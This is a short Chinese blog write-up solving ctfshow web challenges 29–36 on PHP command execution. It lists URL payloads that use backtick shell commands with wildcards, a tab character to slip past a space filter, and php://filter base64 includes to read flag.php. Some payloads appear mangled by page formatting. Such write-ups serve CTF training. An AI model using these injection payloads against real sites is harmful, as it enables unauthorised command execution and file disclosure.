ctfshow-web入门命令执行29

一本正经光头强2023-10-30 15:33

29

源代码给了禁用flag

使用tac、nl

复制代码 
?c=echo `nl f*`;
?c=echo `tac f*`;

30

多禁用了system和php

和上题区别不大,使用上一题命令就能解

?c=echo `nl f*`;

?c=echo `tac f*`;

31

禁用了空格使用%09代替

?c=echo%09`tac%09f*`;

32

禁用了echo

使用php伪协议

?c=include$_GET"1"?>&1=php://filter/read=convert.base64-encode/resource=flag.php

最后解一下base64就行了

33

多过滤了"

?c=include$_GET1?>&1=php://filter/read=convert.base64-encode/resource=flag.php

34-36

一样命令就可以得到flag

相关推荐
Web3探索者3 小时前
可视化服务器管理和传统命令行区别是什么?新手教程:Linux 运维到底该用图形界面还是 SSH 命令行?
linux·ssh
zylyehuo5 小时前
Linux系统中网线与USB网络共享冲突
linux
荣--8 小时前
一键部署不是为了省时间 —— 它是把"买来的 PaaS"变成"自己的平台"的拐点
运维·zabbix·工程化·一键部署·平台化·边界设计
江华森8 小时前
动手实战学 Docker — 从零到集群编排完全指南
运维
Avan_菜菜1 天前
FRP 内网穿透完整实战:从 HTTP 映射到 HTTPS 自签代理
运维·nginx·https
Sokach10151 天前
Linux Shell 脚本从零到能用:一个新手的一天学习总结
linux
SelectDB2 天前
Litefuse 开源并推出单进程轻量模式,25 秒就能跑起来的 Agent 可观测与评估平台
运维·后端·自动化运维
AlfredZhao2 天前
Docker 容器时区不对,`timedatectl` 不存在怎么办?
linux·timezone
zzzzzz3103 天前
9K Star 炸裂开源!这个 C 语言写的代码知识图谱,把 Linux 内核索引压缩到了 3 分钟
linux·服务器·sql
XIAOHEZIcode3 天前
Linux系统鼠标偏移常见原因以及修复方案
linux·运维·游戏
热门推荐
012026年6月AI大模型全景报告:GPT-5.6、Claude Opus 4.8、Gemini 3.5,中美AI三足鼎立谁主沉浮?022026年6月AI行业全景:从百模大战到Agent元年,这30天发生了什么?03【AI】2026 年具身智能模型和世界模型总结042026 年 AI 编程工具终极横评:Cursor vs Claude Code vs Copilot vs Windsurf05Claude Code、Codex、Cursor三分天下:2026年AI编程Agent生态全景剖析06GitHub 镜像站点07【AI总结】2026年6月 主流国内外大模型总结08AI科技热点日报 | 2026年6月1日09AI科技热点日报 | 2026年6月22日10AI一周事件 · 2026-06-03 至 2026-06-09